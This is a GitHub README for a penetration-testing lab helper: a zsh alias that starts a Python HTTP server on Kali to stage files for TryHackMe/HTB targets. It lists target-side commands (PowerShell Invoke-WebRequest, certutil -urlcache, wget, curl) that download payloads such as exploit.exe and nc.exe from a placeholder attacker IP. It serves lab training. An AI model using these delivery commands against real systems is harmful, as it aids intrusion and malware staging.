Skip to content
/ http-lab-setup Public

A minimal HTTP file transfer setup for penetration testing labs.

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

mbcyberworks/http-lab-setup

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

3 Commits
README.md
README.md
Β 
Β 

Repository files navigation

Quick HTTP Server for Penetration Testing Labs (Python)

A minimal HTTP file transfer setup for penetration testing labs.
Designed for reliable file delivery from Kali to targets in local labs and VPN-based environments (TryHackMe / HTB).

This setup prioritizes speed, simplicity, and reliability during lab and exam-style scenarios.

🎯 Use case

  • Deliver files from Kali to a target
  • Ideal for:
    • Payload delivery
    • Tool transfer
    • Script staging
  • Works for:
    • Local labs (virt-manager / NAT)
    • TryHackMe / HTB targets via VPN (tun0)
  • No authentication
  • No system-wide installs
  • Minimal noise and failure points

🧠 Design choices

  • Uses Python’s built-in http.server
  • Started via a shell alias (httpstart)
  • Server listens on 0.0.0.0 (all interfaces)
  • Shares only the current working directory (pwd)
  • Alias prints both LAN and VPN IPs for clarity
  • Intentionally unauthenticated for lab speed and simplicity

πŸ“¦ One-time setup

No installation is required.

Python 3 is already present on Kali Linux.

πŸ”§ Add alias to ~/.zshrc

Open your shell configuration:

nano ~/.zshrc

Add the following block:

# ===============================
# Quick HTTP Server (python)
# ===============================
httpstart() {
  local PORT="${1:-8000}"

  local LANIP TUNIP
  LANIP="$(hostname -I | awk '{print $1}')"
  TUNIP="$(ip -4 -o addr show dev tun0 2>/dev/null | awk '{print $4}' | cut -d/ -f1)"

  echo "[+] HTTP server starting"
  echo "    Directory : $(pwd)"
  [[ -n "$LANIP" ]] && echo "    LAN       : http://$LANIP:$PORT/"
  [[ -n "$TUNIP" ]] && echo "    VPN       : http://$TUNIP:$PORT/"
  echo "    Stop with : CTRL+C"
  echo

  python3 -m http.server "$PORT"
}

Reload your shell:

source ~/.zshrc

πŸš€ Usage

Start HTTP server (default)

httpstart

Defaults

  • Port: 8000
  • Directory: current working directory (pwd)

Custom port

httpstart 8080

Change directory before starting the server.

πŸ“‚ What is shared?

Only the directory from which httpstart is executed.

Example:

~/loot/
β”œβ”€β”€ linpeas.sh
β”œβ”€β”€ exploit.exe
└── tools/
    └── nc.exe

Start the server:

cd ~/loot
httpstart

Available to the target:

http://<KALI_IP>:8000/linpeas.sh
http://<KALI_IP>:8000/exploit.exe
http://<KALI_IP>:8000/tools/nc.exe

Nothing outside this directory is exposed.

πŸͺŸ Windows target examples

PowerShell

Invoke-WebRequest http://<KALI_IP>:8000/file.exe -OutFile file.exe

Restricted environments

certutil -urlcache -f http://<KALI_IP>:8000/file.exe file.exe

🐧 Linux target examples

wget http://<KALI_IP>:8000/file

or:

curl -O http://<KALI_IP>:8000/file

πŸ”Œ Which IP should be used?

Local Windows VM

Use the LAN IP:

192.168.122.x

TryHackMe / HTB target

Use the VPN IP (tun0):

10.x.x.x
192.168.x.x

The server listens on all interfaces (0.0.0.0). The client must connect to an IP it can actually reach.

🧠 Penetration testing mindset

  • Prefer HTTP whenever a target can download files

  • Use FTP only when upload capability is required

  • Avoid shared folders and GUI copy/paste shortcuts

  • Choose transfer methods based on:

    • Routing
    • VPN reachability
    • Reliability
    • Target limitations

βœ… Summary

  • Zero setup
  • One command (httpstart)
  • Shares only the current working directory
  • Clean, reliable, and low-noise
  • Ideal for VPN-based penetration testing labs

About

A minimal HTTP file transfer setup for penetration testing labs.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published